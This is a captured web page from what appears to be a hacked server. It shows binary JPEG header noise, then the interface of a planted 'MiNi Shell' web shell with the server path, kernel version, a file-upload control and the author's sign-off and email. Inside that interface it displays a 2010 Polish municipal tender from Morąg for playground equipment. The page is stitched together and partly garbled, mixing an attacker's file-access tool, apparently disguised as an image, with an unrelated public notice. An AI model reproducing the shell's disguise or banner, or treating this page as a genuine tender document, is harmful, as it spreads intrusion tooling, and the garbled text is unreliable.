JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100421/91951-N-2010.html

<p class="kh_header"><b>Morąg: Wykonanie, dostawa i montaż wyposażenia placów zabaw na terenie Morąga i Gminy Morąg</b><br>
<b>Numer ogłoszenia: 91951 - 2010; data zamieszczenia: 21.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Morągu , ul. 11 Listopada 9, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7572231, faks 089 7572120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie, dostawa i montaż wyposażenia placów zabaw na terenie Morąga i Gminy Morąg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie częściowe Nr 1. Temat: Przedmiotem zamówienia jest wykonanie, dostawa i montaż wyposażenia oraz ogrodzenia placu zabaw na ul. Żeromskiego w Morągu. 

Inwestycja zlokalizowana jest na działce o nr ewidencyjnym 258/58 Obręb Morąg nr 1 położonej przy ul. Żeromskiego w Morągu. Właścicielem działki jest Gmina Morąg. Działka nr 258/58 Obręb Morąg nr 1 stanowiąca teren inwestycji jest działką niezabudowaną.
We wskazanych przez Zamawiającego miejscach należy zamontować następujące urządzenia:
a)zestaw zabawowy składający się z następujących elementów:
Cztery wieże o wysokości min. 3,5 m każda, tj.:
- wieża z dachem dwuspadowym,
- wieża duża,
- wieża z dachem kopertowym,
- wieża z dachem kopertowym z lukarnami.

Dwie zjeżdżalnie o wysokości min. 1 m każda, tj.:
- zjeżdżalnia głęboka,
- zjeżdżalnia dla maluchów.
Rura wspinaczkowa (strażacka) metalowa.

Trzy trapy o wysokości min. 1 m każdy, tj.:
- trap długi,
- trap-drabinka,
- trap wspinaczkowy.

Trzy pomosty o wysokości min. 1 m każdy i długości min. 2 m, tj.:
- pomost ruchomy,
- pomost wiszący,
- pomost z klockami.
Łączny wymiar urządzenia ok. 7x9 m.
Elementy zestawu doposażone w miarę potrzeb bezpieczeństwa w zabezpieczenia sklejkowe.

b)	huśtawka dwuosobowa z belką metalową - 2 szt.
Drewniana konstrukcja z kołków średnicy co najmniej 12 cm i górną belką wykonaną z metalu, do której mocowane będą dwa siedziska na ocynkowanych, łożyskowanych łańcuchach.
Siedziska:
- jedno siedzisko dla dzieci najmłodszych, wykonane z gumy tzw. Koszyk-1 szt.
- drugie siedzisko gumowe dla dzieci starszych - 3 szt.
Siedziska zawieszone - ok. 40cm nad podłożem.

c)	huśtawka bujak - 2 szt.
Huśtawka dwuosobowa wagowa bez sprężynowa na podstawie metalowej - 2 szt. - długość belka min 2,4 m.

d)	karuzela
Umożliwiająca zabawę co najmniej 3 osobom jednocześnie, ramię krzyżakowe o śr. ok. 180 cm.
dodatkowo posiadająca co najmniej 3 siedziska umożliwiające siedzenie dzieci podczas zabawy.

e)	karuzela
Umożliwiająca zabawę co najmniej 3 osobom jednocześnie, z podstawą wykonaną z blachy ryflowanej o śr. ok. 120 cm.
dodatkowo posiadająca co najmniej 3 rurki umożliwiające trzymanie się podczas zabawy.

f)	ławka drewniana z oparciem - 2 szt.
Mocowana na stałe w gruncie o długości ok. 180 cm i szerokości ok. 40 cm.

g)	kosz na śmieci - 2 szt.
Wykonany z półwałków drewnianych.

h)	Ogrodzenie
Wykonane z bali drewnianych kładzionych poziomo o wysokości 1 m o długości całkowitej 78 mb w tym furtka o wysokości 1 m o długości 1mb.

Elementy stanowiące wyposażenie placów zabaw (z wyłączeniem ławek, koszy na śmieci) muszą posiadać certyfikaty, że dostarczone produkty odpowiadają obowiązującym normom lub specyfikacjom technicznym. Urządzenia do wyposażenia placów zabaw muszą spełniać wymogi bezpieczeństwa w zakresie projektowania, produkcji, montażu i konserwacji zgodnie z obowiązującymi normami polskimi lub zharmonizowanymi normami europejskimi. 

Urządzenia do placu zabaw muszą spełniać następujące wymogi:
- podstawowe surowce użyte do wykonania zabawek: drewno klejone lub drewno bezrdzeniowe, frezowane, impregnowane metodą ciśnieniowo - próżniową, stal ocynkowana ogniowo, malowana farbami akrylowymi, stal nierdzewna,
- złącza konstrukcji trwale odporne na częste luzowanie się (specjalna konstrukcja śrub i zabezpieczeń),
- sprężyny do zabawek specjalnie do tego celu konstruowane i testowane, 
- wszystkie śruby i wkręty przykryte gładkimi, samo-zatrzaskującymi się nasadkami ochronnymi z odpornego na uderzenia i niepalnego tworzywa, 
- sklejka wodoodporna liściasta z filmem melaminowym,
- siatki i liny wykonane z materiału uniemożliwiającego przecięcie, 
- części stalowe ocynkowane ogniowo, malowane farbami akrylowymi,
- łańcuchy o małych ogniwach,
- części z tworzyw sztucznych odporne na działanie niskich i wysokich temperatur.
Zastosowane materiały, śruby, łańcuchy, sprężyny, substancje i inne połączenia oraz elementy zabezpieczające użyte przy produkcji i montażu urządzeń muszą posiadać wymagane atesty i dokumenty potwierdzające dopuszczenie do użytkowania.
Zjeżdżalnia - ślizg należy wykonać z blachy kwasoodpornej o grubości min. 2,50 mm. Boki wykonane z blachy węglowej o grubości do 2,00 mm wzmocnionej profilami zamkniętymi i rurą oraz pomalowane farbą podkładową antykorozyjną i następnie malowane proszkowo.
Elementy należy mocować w gruncie przy pomocy metalowych kotew ocynkowanych ogniowo, które należy umieszczać w dołkach o głębokości 60-80 cm i zalać betonem. 
Do montażu urządzeń należy zastosować beton żwirowy b15.

Zadanie częściowe Nr 2. Przedmiotem zamówienia jest wykonanie, dostawa i montaż wyposażenia placu zabaw na terenie plaży głównej w Kretowinach. 
Inwestycja zlokalizowana jest na działkach o nr ewidencyjnych 715/10, 724/1 położonych w Kretowinach. Właścicielem działki jest Gmina Morąg. 
We wskazanych przez Zamawiającego miejscach należy zamontować następujące urządzenia:

a)	zestaw zabawowy składający się z następujących elementów:
Cztery wieże o wysokości min. 3,5 m każda, tj.:
- wieża z dachem dwuspadowym,
- wieża duża,
- wieża z dachem kopertowym,
- wieża z dachem kopertowym z lukarnami.
Dwie zjeżdżalnie o wysokości min. 1 m każda, tj.:
- zjeżdżalnia głęboka,
- zjeżdżalnia dla maluchów.
	  		
Rura wspinaczkowa (strażacka) metalowa.

Trzy trapy o wysokości min. 1 m każdy, tj.:
- trap długi,
- trap-drabinka,
- trap wspinaczkowy.

Trzy pomosty o wysokości min. 1 m każdy i długości min. 2 m, tj.:	
- pomost ruchomy,
- pomost wiszący,
- pomost z klockami.

Łączny wymiar urządzenia ok. 7x9 m.
Elementy zestawu doposażone w miarę potrzeb bezpieczeństwa w zabezpieczenia sklejkowe.

b)	zjazd linowy
Wymiary: ok. 24,00 x 3,50 x 3,50 m 

c)	huśtawka dwuosobowa z belką metalową - 2 szt.
Drewniana konstrukcja z kołków średnicy co najmniej 12 cm i górną belką wykonaną z metalu, do której mocowane będą dwa siedziska na ocynkowanych, łożyskowanych łańcuchach.
Siedziska:
- jedno siedzisko dla dzieci najmłodszych, wykonane z gumy tzw. Koszyk-1 szt.
- drugie siedzisko gumowe dla dzieci starszych - 3 szt.
Siedziska zawieszone - ok. 40cm nad podłożem.

d)	huśtawki bujaki
Wykonana ze sklejki, huśtawka mocowana na sprężynie, wzór w kształcie koniczyny - wys. całkowita min. 0,7m
Huśtawka dwuosobowa wagowa bez sprężynowa na podstawie metalowej - 2 szt. - długość belka min 2,4 m.

e)	karuzela
Umożliwiająca zabawę co najmniej 3 osobom jednocześnie, z podstawą wykonaną z blachy ryflowanej o śr. ok. 120 cm.
Dodatkowo posiadająca co najmniej 3 rurki umożliwiające trzymanie się podczas zabawy

f)	sześciokąt wielofunkcyjny o średnicy min 3 m i wysokości min.2 m, wyposażone w min:

- Drabinka drewniana (różne płaszczyzny),
- Drążek zwisowy na łańcuchach,
- Drabinka łańcuchowa,
- Rura wspinaczkowa (strażacka).

g)	ławka drewniana z oparciem - 2 szt.
Mocowana na stałe w gruncie o długości ok. 180 cm i szerokości ok. 40 cm.

h)	kosz na śmieci - 1 szt.
Wykonany z półwałków drewnianych.

Elementy stanowiące wyposażenie placów zabaw (z wyłączeniem ławek, koszy na śmieci) muszą posiadać certyfikaty, że dostarczone produkty odpowiadają obowiązującym normom lub specyfikacjom technicznym. 
Urządzenia do wyposażenia placów zabaw muszą spełniać wymogi bezpieczeństwa w zakresie projektowania, produkcji, montażu i konserwacji zgodnie z obowiązującymi normami polskimi lub zharmonizowanymi normami europejskimi. 
Urządzenia do placu zabaw muszą spełniać następujące wymogi:
- podstawowe surowce użyte do wykonania zabawek: drewno klejone lub drewno bezrdzeniowe, frezowane, impregnowane metodą ciśnieniowo - próżniową, stal ocynkowana ogniowo, malowana farbami akrylowymi, stal nierdzewna,
- złącza konstrukcji trwale odporne na częste luzowanie się (specjalna konstrukcja śrub i zabezpieczeń),
- sprężyny do zabawek specjalnie do tego celu konstruowane i testowane, 
- wszystkie śruby i wkręty przykryte gładkimi, samo-zatrzaskującymi się nasadkami ochronnymi z odpornego na uderzenia i niepalnego tworzywa, 
- sklejka wodoodporna liściasta z filmem melaminowym,
- siatki i liny wykonane z materiału uniemożliwiającego przecięcie, 
- części stalowe ocynkowane ogniowo, malowane farbami akrylowymi,
- łańcuchy o małych ogniwach,
- części z tworzyw sztucznych odporne na działanie niskich i wysokich temperatur.
Zastosowane materiały, śruby, łańcuchy, sprężyny, substancje i inne połączenia oraz elementy zabezpieczające użyte przy produkcji i montażu urządzeń muszą posiadać wymagane atesty i dokumenty potwierdzające dopuszczenie do użytkowania.
Zjeżdżalnia - ślizg należy wykonać z blachy kwasoodpornej o grubości min. 2,50 mm. Boki wykonane z blachy węglowej o grubości do 2,00 mm wzmocnionej profilami zamkniętymi i rurą oraz pomalowane farbą podkładową antykorozyjną i następnie malowane proszkowo.
Elementy należy mocować w gruncie przy pomocy metalowych kotew ocynkowanych ogniowo, które należy umieszczać w dołkach o głębokości 60-80 cm i zalać betonem. 
Do montażu urządzeń należy zastosować beton żwirowy b15..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu zamówień tego samego rodzaju, zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.50.00-7, 37.53.51.00-8, 37.53.52.00-9, 37.53.52.10-2, 37.53.52.30-8, 37.53.52.20-5, 37.53.52.40-1, 37.53.52.50-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1	Oferta musi być zabezpieczona wadium w wysokości: 
Dla zadania częściowego nr 1: 1 500.00 PLN (słownie:  jeden tysiąc pięćset  00/100 PLN)
Dla zadania częściowego nr 2: 1 500.00 PLN (słownie:  jeden tysiąc pięćset  00/100 PLN)
9.2	Wadium należy wnieść  w terminie do dnia 2010-04-29 do godz. 09:00.
9.3	Wadium może być wnoszone w jednej lub kilku następujących formach:
a:	pieniądzu:
przelewem na rachunek bankowy Zamawiającego: Bank Millennium S.A. Warszawa o/Morąg 32116022020000000061934146;
b:	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c:	gwarancjach bankowych;
d:	gwarancjach ubezpieczeniowych;
e:	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy
Zobowiązanie do wniesienia zabezpieczenia	
Oświadczenie o zgodności z warunkami przetargu
Dowód wpłaty wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/morag_gmina_miejska/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Morągu
ul. 11 Listopada 9 
14-300 Morąg
pok. Nr 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2010 godzina 09:00, miejsce: Urząd Miejski w Morągu
ul. 11 Listopada 9 
14-300 Morąg
pok. Nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com